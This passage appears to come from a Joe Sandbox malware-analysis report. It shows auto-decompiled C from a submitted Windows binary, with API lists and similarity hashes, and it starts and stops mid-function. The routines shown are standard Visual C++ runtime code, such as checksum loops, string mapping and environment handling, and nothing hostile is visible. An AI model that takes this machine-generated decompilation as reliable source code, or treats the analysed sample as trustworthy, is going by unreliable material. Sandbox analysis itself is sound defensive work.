                              						_t44 = _t42 ^  *(_t63 + _t69);
                              						_t59 =  *(_t63 + _t69 + 4);
                              						do {
                              							_t50 = _t59 & 0x000000ff;
                              							_t51 = _t59 & 0x000000ff;
                              							_t60 = _t59 >> 0x10;
                              							_t59 =  *(_t63 + _t69 + 0xc);
                              							_t44 =  *(_t86 + 0x1000 + (_t44 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t63 + _t69 + 8) ^  *(_t86 + 0xc00 + _t50 * 4) ^  *(_t86 + 0x800 + _t51 * 4) ^  *(_t86 + 0x400 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + (_t60 & 0x000000ff) * 4) ^  *(_t86 + 0x1c00 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1800 + (_t44 & 0x000000ff) * 4) ^  *(_t86 + 0x1400 + (_t44 >> 0x00000010 & 0x000000ff) * 4);
                              							_t63 = _t63 + 8;
                              						} while (_t63 != 0);
                              						_t42 = _t44 ^  *(_t63 + _t69);
                              						_t62 = _t69;
                              						_t65 = _a8 - _t62;
                              						L7:
                              						while(_t65 != 0) {
                              							_t73 =  *_t62 & 0x000000ff;
                              							_t62 = _t62 + 1;
                              							_t42 = _t42 >> 0x00000008 ^  *(_t86 + (_t73 ^ _t42 & 0x000000ff) * 4);
                              							_t65 = _t65 - 1;
                              						}
                              						return _t42;
                              					}
                              				}
                              				goto L7;
                              			}


















                              Similarity
                              • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                              • Instruction ID: d8f843b74cbd450328ce6fa4395b1e87caa1541ea2f4e00bece6a97874f35350
                              • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                              • Instruction Fuzzy Hash: 9F21D7329046254BCB42DE6EE4845A7F392FBC437AF23472BED8467290C638E855D6A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00418FCB(signed char __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
                              				signed char _t39;
                              				signed int _t41;
                              				signed int _t63;
                              				void* _t64;
                              				intOrPtr _t65;
                              				intOrPtr _t66;
                              				signed int _t68;
                              				signed int _t70;
                              				signed int _t74;
                              				intOrPtr _t76;
                              
                              				_t63 = __edx;
                              				_t39 = __ecx;
                              				_t65 = _a4;
                              				_t76 = _a8;
                              				if(_t65 != 0) {
                              					while((_t63 & 0x00000007) != 0) {
                              						_t74 =  *_t63 & 0x000000ff;
                              						_t63 = _t63 + 1;
                              						_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t74 ^ _t39 & 0x000000ff) * 4);
                              						_t65 = _t65 - 1;
                              						if(_t65 != 0) {
                              							continue;
                              						}
                              						break;
                              					}
                              					if(_t65 >= 0x10) {
                              						_t66 = _t65 + _t63;
                              						_a4 = _t66;
                              						_t68 = _t66 - 0x00000008 & 0xfffffff8;
                              						_t64 = _t63 - _t68;
                              						_t41 = _t39 ^  *(_t64 + _t68);
                              						do {
                              							_t41 =  *(_t76 + 0xc00 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t64 + _t68 + 8) ^  *(_t76 + 0x800 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) & 0x000000ff) * 4) ^  *(_t76 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (( *(_t76 + 0xc00 + (_t41 & 0x000000ff) * 4) ^  *(_t64 + _t68 + 4) ^  *(_t76 + 0x800 + (_t41 & 0x000000ff) * 4) ^  *(_t76 + (_t41 >> 0x00000010 & 0x000000ff) * 4) ^  *(_t76 + 0x400 + (_t41 >> 0x00000010 & 0x000000ff) * 4)) >> 0x00000010 & 0x000000ff) * 4);
                              							_t64 = _t64 + 8;
                              						} while (_t64 != 0);
                              						_t39 = _t41 ^  *(_t64 + _t68);
                              						_t63 = _t68;
                              						_t65 = _a4 - _t63;
                              						L8:
                              						while(_t65 != 0) {
                              							_t70 =  *_t63 & 0x000000ff;
                              							_t63 = _t63 + 1;
                              							_t39 = _t39 >> 0x00000008 ^  *(_t76 + (_t70 ^ _t39 & 0x000000ff) * 4);
                              							_t65 = _t65 - 1;
                              						}
                              						return _t39;
                              					}
                              				}
                              				goto L8;
                              			}














                              Similarity
                              • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                              • Instruction ID: adcd1020660a0caec7aa531f2501062eb824b7187074cdff0887c6cd02d8138b
                              • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                              • Instruction Fuzzy Hash: EF21377291442587C701DF1DE4986B7B7E1FFC8319F678B2BD9818B180CA39DC81D690
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E00417836(void* __edi, long _a4) {
                              				char _v164;
                              				char _v424;
                              				int _t17;
                              				long _t19;
                              				signed int _t42;
                              				long _t47;
                              				void* _t48;
                              				signed int _t54;
                              				void** _t56;
                              				void* _t57;
                              
                              				_t48 = __edi;
                              				_t47 = _a4;
                              				_t42 = 0;
                              				_t17 = 0x422a58;
                              				while(_t47 !=  *_t17) {
                              					_t17 = _t17 + 8;
                              					_t42 = _t42 + 1;
                              					if(_t17 < 0x422ae8) {
                              						continue;
                              					}
                              					break;
                              				}
                              				_t54 = _t42 << 3;
                              				_t2 = _t54 + 0x422a58; // 0x2c000000
                              				if(_t47 ==  *_t2) {
                              					_t17 =  *0x423348; // 0x0
                              					if(_t17 == 1 || _t17 == 0 &&  *0x420734 == 1) {
                              						_t16 = _t54 + 0x422a5c; // 0x41bd2c
                              						_t56 = _t16;
                              						_t19 = E004144D0( *_t56);
                              						_t17 = WriteFile(GetStdHandle(0xfffffff4),  *_t56, _t19,  &_a4, 0);
                              					} else {
                              						if(_t47 != 0xfc) {
                              							if(GetModuleFileNameA(0,  &_v424, 0x104) == 0) {
                              								E00418230( &_v424, "<program name unknown>");
                              							}
                              							_push(_t48);
                              							_t49 =  &_v424;
                              							if(E004144D0( &_v424) + 1 > 0x3c) {
                              								_t49 = E004144D0( &_v424) +  &_v424 - 0x3b;
                              								E004183B0(E004144D0( &_v424) +  &_v424 - 0x3b, "...", 3);
                              								_t57 = _t57 + 0x10;
                              							}
                              							E00418230( &_v164, "Runtime Error!\n\nProgram: ");
                              							E00418240( &_v164, _t49);
                              							E00418240( &_v164, "\n\n");
                              							_t12 = _t54 + 0x422a5c; // 0x41bd2c
                              							E00418240( &_v164,  *_t12);
                              							_t17 = E00418320( &_v164, "Microsoft Visual C++ Runtime Library", 0x12010);
                              						}
                              					}
                              				}
                              				return _t17;
                              			}














                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 004178A3
                              • GetStdHandle.KERNEL32(000000F4,0041BD2C,00000000,00000000,00000000,?), ref: 00417979
                              • WriteFile.KERNEL32(00000000), ref: 00417980
                              Similarity
                              • API ID: File$HandleModuleNameWrite
                              • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $X*B$*B
                              • API String ID: 3784150691-2787626558
                              • Opcode ID: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                              • Instruction ID: 83e6cc08efc147308ddc610541e3e7ace00831554afff49654370310fabd765f
                              • Opcode Fuzzy Hash: a5ae5b659794e102b2e8aa4557315333f416c08d847f0ab12ced78ba572f4f7a
                              • Instruction Fuzzy Hash: 6E310472A00218AFEF20E660DD45FDA737DEB45344F5000ABF544D6140EBBCAAC58BAD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 61%
                              			E0041881D(int _a4, int _a8, signed char _a9, char* _a12, int _a16, short* _a20, int _a24, int _a28, signed int _a32) {
                              				signed int _v8;
                              				intOrPtr _v20;
                              				short* _v28;
                              				int _v32;
                              				short* _v36;
                              				short* _v40;
                              				int _v44;
                              				void* _v60;
                              				int _t61;
                              				int _t62;
                              				int _t82;
                              				int _t83;
                              				int _t88;
                              				short* _t89;
                              				int _t90;
                              				void* _t91;
                              				int _t99;
                              				intOrPtr _t101;
                              				short* _t102;
                              				int _t104;
                              
                              				_push(0xffffffff);
                              				_push(0x41be00);
                              				_push(E00414A2C);
                              				_push( *[fs:0x0]);
                              				 *[fs:0x0] = _t101;
                              				_t102 = _t101 - 0x1c;
                              				_v28 = _t102;
                              				_t104 =  *0x423554; // 0x1
                              				if(_t104 != 0) {
                              					L5:
                              					if(_a16 > 0) {
                              						_t83 = E00418A41(_a12, _a16);
                              						_pop(_t91);
                              						_a16 = _t83;
                              					}
                              					_t61 =  *0x423554; // 0x1
                              					if(_t61 != 2) {
                              						if(_t61 != 1) {
                              							goto L21;
                              						} else {
                              							if(_a28 == 0) {
                              								_t82 =  *0x42354c; // 0x0
                              								_a28 = _t82;
                              							}
                              							asm("sbb eax, eax");
                              							_t88 = MultiByteToWideChar(_a28, ( ~_a32 & 0x00000008) + 1, _a12, _a16, 0, 0);
                              							_v32 = _t88;
                              							if(_t88 == 0) {
                              								goto L21;
                              							} else {
                              								_v8 = 0;
                              								E00413CC0(_t88 + _t88 + 0x00000003 & 0x000000fc, _t91);
                              								_v28 = _t102;
                              								_v40 = _t102;
                              								_v8 = _v8 | 0xffffffff;
                              								if(_v40 == 0 || MultiByteToWideChar(_a28, 1, _a12, _a16, _v40, _t88) == 0) {
                              									goto L21;
                              								} else {
                              									_t99 = LCMapStringW(_a4, _a8, _v40, _t88, 0, 0);
                              									_v44 = _t99;
                              									if(_t99 == 0) {
                              										goto L21;
                              									} else {
                              										if((_a9 & 0x00000004) == 0) {
                              											_v8 = 1;
                              											E00413CC0(_t99 + _t99 + 0x00000003 & 0x000000fc, _t91);
                              											_v28 = _t102;
                              											_t89 = _t102;
                              											_v36 = _t89;
                              											_v8 = _v8 | 0xffffffff;
                              											if(_t89 == 0 || LCMapStringW(_a4, _a8, _v40, _v32, _t89, _t99) == 0) {
                              												goto L21;
                              											} else {
                              												_push(0);
                              												_push(0);
                              												if(_a24 != 0) {
                              													_push(_a24);
                              													_push(_a20);
                              												} else {
                              													_push(0);
                              													_push(0);
                              												}
                              												_t99 = WideCharToMultiByte(_a28, 0x220, _t89, _t99, ??, ??, ??, ??);
                              												if(_t99 == 0) {
                              													goto L21;
                              												} else {
                              													goto L30;
                              												}
                              											}
                              										} else {
                              											if(_a24 == 0 || _t99 <= _a24 && LCMapStringW(_a4, _a8, _v40, _t88, _a20, _a24) != 0) {
                              												L30:
                              												_t62 = _t99;
                              											} else {
                              												goto L21;
                              											}
                              										}
                              									}
                              								}
                              							}
                              						}
                              					} else {
                              						_t62 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                              					}
                              				} else {
                              					_push(0);
                              					_push(0);
                              					_t90 = 1;
                              					if(LCMapStringW(0, 0x100, 0x41bdf8, _t90, ??, ??) == 0) {
                              						if(LCMapStringA(0, 0x100, 0x41bdf4, _t90, 0, 0) == 0) {
                              							L21:
                              							_t62 = 0;
                              						} else {
                              							 *0x423554 = 2;
                              							goto L5;
                              						}
                              					} else {
                              						 *0x423554 = _t90;
                              						goto L5;
                              					}
                              				}
                              				 *[fs:0x0] = _v20;
                              				return _t62;
                              			}

                              APIs
                              • LCMapStringW.KERNEL32(00000000,00000100,0041BDF8,00000001,00000000,00000000,766870F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 0041885F
                              • LCMapStringA.KERNEL32(00000000,00000100,0041BDF4,00000001,00000000,00000000,?,?,004186BE,?,?,?,00000000,00000001), ref: 0041887B
                              • LCMapStringA.KERNEL32(?,?,?,004186BE,?,?,766870F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188C4
                              • MultiByteToWideChar.KERNEL32(?,004256C5,?,004186BE,00000000,00000000,766870F0,004256C4,?,?,?,004186BE,?,?,?,00000000), ref: 004188FC
                              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,004186BE,?,00000000,?,?,004186BE,?), ref: 00418954
                              • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,004186BE,?), ref: 0041896A
                              • LCMapStringW.KERNEL32(?,?,?,00000000,?,?,?,?,004186BE,?), ref: 0041899D
                              • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,?,004186BE,?), ref: 00418A05
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: String$ByteCharMultiWide
                              • String ID:
                              • API String ID: 352835431-0
                              • Opcode ID: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                              • Instruction ID: 3960beb12fca16cbc5043acf4b8975ab8d8a6698fa07e30ad5f7fd63c5f4fb56
                              • Opcode Fuzzy Hash: 7893c33c6b407451d02d995758827eecb7b20065fa294207cf6247e34bc0c6e9
                              • Instruction Fuzzy Hash: 14517B71900209EFCF228F95CC45AEF7FB5FF48794F10452AF918A1260C7398991DBAA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E0041750F() {
                              				int _v4;
                              				int _v8;
                              				intOrPtr _t7;
                              				CHAR* _t9;
                              				WCHAR* _t17;
                              				int _t20;
                              				char* _t24;
                              				int _t32;
                              				CHAR* _t36;
                              				WCHAR* _t38;
                              				void* _t39;
                              				int _t42;
                              
                              				_t7 =  *0x423508; // 0x1
                              				_t32 = 0;
                              				_t38 = 0;
                              				_t36 = 0;
                              				if(_t7 != 0) {
                              					if(_t7 != 1) {
                              						if(_t7 != 2) {
                              							L27:
                              							return 0;
                              						}
                              						L18:
                              						if(_t36 != _t32) {
                              							L20:
                              							_t9 = _t36;
                              							if( *_t36 == _t32) {
                              								L23:
                              								_t41 = _t9 - _t36 + 1;
                              								_t39 = E00413E65(_t9 - _t36 + 1);
                              								if(_t39 != _t32) {
                              									E00414090(_t39, _t36, _t41);
                              								} else {
                              									_t39 = 0;
                              								}
                              								FreeEnvironmentStringsA(_t36);
                              								return _t39;
                              							} else {
                              								goto L21;
                              							}
                              							do {
                              								do {
                              									L21:
                              									_t9 =  &(_t9[1]);
                              								} while ( *_t9 != _t32);
                              								_t9 =  &(_t9[1]);
                              							} while ( *_t9 != _t32);
                              							goto L23;
                              						}
                              						_t36 = GetEnvironmentStrings();
                              						if(_t36 == _t32) {
                              							goto L27;
                              						}
                              						goto L20;
                              					}
                              					L6:
                              					if(_t38 != _t32) {
                              						L8:
                              						_t17 = _t38;
                              						if( *_t38 == _t32) {
                              							L11:
                              							_t20 = (_t17 - _t38 >> 1) + 1;
                              							_v4 = _t20;
                              							_t42 = WideCharToMultiByte(_t32, _t32, _t38, _t20, _t32, _t32, _t32, _t32);
                              							if(_t42 != _t32) {
                              								_t24 = E00413E65(_t42);
                              								_v8 = _t24;
                              								if(_t24 != _t32) {
                              									if(WideCharToMultiByte(_t32, _t32, _t38, _v4, _t24, _t42, _t32, _t32) == 0) {
                              										E00413F9F(_v8);
                              										_v8 = _t32;
                              									}
                              									_t32 = _v8;
                              								}
                              							}
                              							FreeEnvironmentStringsW(_t38);
                              							return _t32;
                              						} else {
                              							goto L9;
                              						}
                              						do {
                              							do {
                              								L9:
                              								_t17 =  &(_t17[1]);
                              							} while ( *_t17 != _t32);
                              							_t17 =  &(_t17[1]);
                              						} while ( *_t17 != _t32);
                              						goto L11;
                              					}
                              					_t38 = GetEnvironmentStringsW();
                              					if(_t38 == _t32) {
                              						goto L27;
                              					}
                              					goto L8;
                              				}
                              				_t38 = GetEnvironmentStringsW();
                              				if(_t38 == 0) {
                              					_t36 = GetEnvironmentStrings();
                              					if(_t36 == 0) {
                              						goto L27;
                              					}
                              					 *0x423508 = 2;
                              					goto L18;
                              				}
                              				 *0x423508 = 1;
                              				goto L6;
                              			}

                              APIs
                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041752A
                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041753E
                              • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 0041756A
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175A2
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175C4
                              • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00414B9A), ref: 004175DD
                              • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00414B9A), ref: 004175F0
                              • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041762E
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                              • String ID:
                              • API String ID: 1823725401-0
                              • Opcode ID: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                              • Instruction ID: 0d29547afa55ef8e208fbe3ff43deda8167c9cf171b961166aceb77faed46397
                              • Opcode Fuzzy Hash: da4329af8d6592d056d9235971ceaca8771b6712013f4c601b47c126e69dc7f4
                              • Instruction Fuzzy Hash: 4A31ADB250D3157ED7207F799C848FBBABDEA49368B11053BF555C3200EA298DC286AD
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 78%
                              			E00418A6C(int _a4, char* _a8, int _a12, short* _a16, int _a20, int _a24, signed int _a28) {
                              				int _v8;
                              				intOrPtr _v20;
                              				short* _v28;
                              				short _v32;
                              				int _v36;
                              				short* _v40;
                              				void* _v56;
                              				int _t31;
                              				int _t32;
                              				int _t37;
                              				int _t43;
                              				int _t44;
                              				int _t45;
                              				void* _t53;
                              				short* _t60;
                              				int _t61;
                              				intOrPtr _t62;
                              				short* _t63;
                              
                              				_push(0xffffffff);
                              				_push(0x41be18);
                              				_push(E00414A2C);
                              				_push( *[fs:0x0]);
                              				 *[fs:0x0] = _t62;
                              				_t63 = _t62 - 0x18;
                              				_v28 = _t63;
                              				_t31 =  *0x423558; // 0x1
                              				if(_t31 != 0) {
                              					L6:
                              					if(_t31 != 2) {
                              						if(_t31 != 1) {
                              							goto L18;
                              						} else {
                              							if(_a20 == 0) {
                              								_t44 =  *0x42354c; // 0x0
                              								_a20 = _t44;
                              							}
                              							asm("sbb eax, eax");
                              							_t37 = MultiByteToWideChar(_a20, ( ~_a28 & 0x00000008) + 1, _a8, _a12, 0, 0);
                              							_v36 = _t37;
                              							if(_t37 == 0) {
                              								goto L18;
                              							} else {
                              								_v8 = 0;
                              								E00413CC0(_t37 + _t37 + 0x00000003 & 0x000000fc, _t53);
                              								_v28 = _t63;
                              								_t60 = _t63;
                              								_v40 = _t60;
                              								E00417DA0(_t60, 0, _t37 + _t37);
                              								_v8 = _v8 | 0xffffffff;
                              								if(_t60 == 0) {
                              									goto L18;
                              								} else {
                              									_t43 = MultiByteToWideChar(_a20, 1, _a8, _a12, _t60, _v36);
                              									if(_t43 == 0) {
                              										goto L18;
                              									} else {
                              										_t32 = GetStringTypeW(_a4, _t60, _t43, _a16);
                              									}
                              								}
                              							}
                              						}
                              					} else {
                              						_t45 = _a24;
                              						if(_t45 == 0) {
                              							_t45 =  *0x42353c; // 0x0
                              						}
                              						_t32 = GetStringTypeA(_t45, _a4, _a8, _a12, _a16);
                              					}
                              				} else {
                              					_push( &_v32);
                              					_t61 = 1;
                              					if(GetStringTypeW(_t61, 0x41bdf8, _t61, ??) == 0) {
                              						if(GetStringTypeA(0, _t61, 0x41bdf4, _t61,  &_v32) == 0) {
                              							L18:
                              							_t32 = 0;
                              						} else {
                              							_t31 = 2;
                              							goto L5;
                              						}
                              					} else {
                              						_t31 = _t61;
                              						L5:
                              						 *0x423558 = _t31;
                              						goto L6;
                              					}
                              				}
                              				 *[fs:0x0] = _v20;
                              				return _t32;
                              			}

                              APIs
                              • GetStringTypeW.KERNEL32(00000001,0041BDF8,00000001,?,766870F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AAB
                              • GetStringTypeA.KERNEL32(00000000,00000001,0041BDF4,00000001,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AC5
                              • GetStringTypeA.KERNEL32(?,?,?,?,004186BE,766870F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418AF9
                              • MultiByteToWideChar.KERNEL32(?,004256C5,?,?,00000000,00000000,766870F0,004256C4,?,?,004186BE,?,?,?,00000000,00000001), ref: 00418B31
                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,004186BE,?), ref: 00418B87
                              • GetStringTypeW.KERNEL32(?,?,00000000,004186BE,?,?,?,?,?,?,004186BE,?), ref: 00418B99
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: StringType$ByteCharMultiWide
                              • String ID:
                              • API String ID: 3852931651-0
                              • Opcode ID: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                              • Instruction ID: e288f18e772608454304c6360a88be647065f5ca3cb36798b5d5ed4d75a3f5a0
                              • Opcode Fuzzy Hash: 3d6b6e16685600d833415d128f0286c3ce565afe4e7b6c7271f7b5a09b5fc09b
                              • Instruction Fuzzy Hash: B0416DB2600219BFCF208F94DC86EEF7F79EB08794F10442AF915D2250D7389991CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 91%
                              			E004158B0(void* __ecx, void* __eflags) {
                              				char _v8;
                              				struct _OSVERSIONINFOA _v156;
                              				char _v416;
                              				char _v4656;
                              				void* _t24;
                              				CHAR* _t32;
                              				void* _t33;
                              				intOrPtr* _t34;
                              				void* _t35;
                              				char _t36;
                              				char _t38;
                              				void* _t40;
                              				char* _t44;
                              				char* _t45;
                              				char* _t50;
                              
                              				E00413CC0(0x122c, __ecx);
                              				_v156.dwOSVersionInfoSize = 0x94;
                              				if(GetVersionExA( &_v156) != 0 && _v156.dwPlatformId == 2 && _v156.dwMajorVersion >= 5) {
                              					_t40 = 1;
                              					return _t40;
                              				}
                              				if(GetEnvironmentVariableA("__MSVCRT_HEAP_SELECT",  &_v4656, 0x1090) == 0) {
                              					L28:
                              					_t24 = E00415883( &_v8);
                              					asm("sbb eax, eax");
                              					return _t24 + 3;
                              				}
                              				_t44 =  &_v4656;
                              				if(_v4656 != 0) {
                              					do {
                              						_t38 =  *_t44;
                              						if(_t38 >= 0x61 && _t38 <= 0x7a) {
                              							 *_t44 = _t38 - 0x20;
                              						}
                              						_t44 = _t44 + 1;
                              					} while ( *_t44 != 0);
                              				}
                              				if(E00417D60("__GLOBAL_HEAP_SELECTED",  &_v4656, 0x16) != 0) {
                              					GetModuleFileNameA(0,  &_v416, 0x104);
                              					_t45 =  &_v416;
                              					if(_v416 != 0) {
                              						do {
                              							_t36 =  *_t45;
                              							if(_t36 >= 0x61 && _t36 <= 0x7a) {
                              								 *_t45 = _t36 - 0x20;
                              							}
                              							_t45 = _t45 + 1;
                              						} while ( *_t45 != 0);
                              					}
                              					_t32 = E00417CE0( &_v4656,  &_v416);
                              				} else {
                              					_t32 =  &_v4656;
                              				}
                              				if(_t32 == 0) {
                              					goto L28;
                              				}
                              				_t33 = E00417C20(_t32, 0x2c);
                              				if(_t33 == 0) {
                              					goto L28;
                              				}
                              				_t34 = _t33 + 1;
                              				_t50 = _t34;
                              				if( *_t34 != 0) {
                              					do {
                              						if( *_t50 != 0x3b) {
                              							_t50 = _t50 + 1;
                              						} else {
                              							 *_t50 = 0;
                              						}
                              					} while ( *_t50 != 0);
                              				}
                              				_t35 = E004179F0(_t34, 0, 0xa);
                              				if(_t35 != 2 && _t35 != 3 && _t35 != 1) {
                              					goto L28;
                              				}
                              				return _t35;
                              			}

                              APIs
                              • GetVersionExA.KERNEL32 ref: 004158CF
                              • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00415904
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00415964
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: EnvironmentFileModuleNameVariableVersion
                              • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                              • API String ID: 1385375860-4131005785
                              • Opcode ID: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                              • Instruction ID: 007b09a40ac423c1d447adb87a92c2e34be193f5817f586218815b66d4303cb2
                              • Opcode Fuzzy Hash: a0a65974b78899c378749041d22a9f94542c4ef0915f209cf1eaea54d79fba9d
                              • Instruction Fuzzy Hash: 403177F1961648EDEF3196709C82BDF3B78DB46324F2400DBD185D6242E6388EC68B1B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 99%
                              			E00417641() {
                              				void** _v8;
                              				struct _STARTUPINFOA _v76;
                              				signed int* _t48;
                              				signed int _t50;
                              				long _t55;
                              				signed int _t57;
                              				signed int _t58;
                              				int _t59;
                              				signed char _t63;
                              				signed int _t65;
                              				void** _t67;
                              				int _t68;
                              				int _t69;
                              				signed int* _t70;
                              				int _t72;
                              				intOrPtr* _t73;
                              				signed int* _t75;
                              				void* _t76;
                              				void* _t84;
                              				void* _t87;
                              				int _t88;
                              				signed int* _t89;
                              				void** _t90;
                              				signed int _t91;
                              				int* _t92;
                              
                              				_t89 = E00413E65(0x480);
                              				if(_t89 == 0) {
                              					E00414C0C(0x1b);
                              				}
                              				 *0x425900 = _t89;
                              				 *0x425a00 = 0x20;
                              				_t1 =  &(_t89[0x120]); // 0x480
                              				_t48 = _t1;
                              				while(_t89 < _t48) {
                              					_t89[1] = _t89[1] & 0x00000000;
                              					 *_t89 =  *_t89 | 0xffffffff;
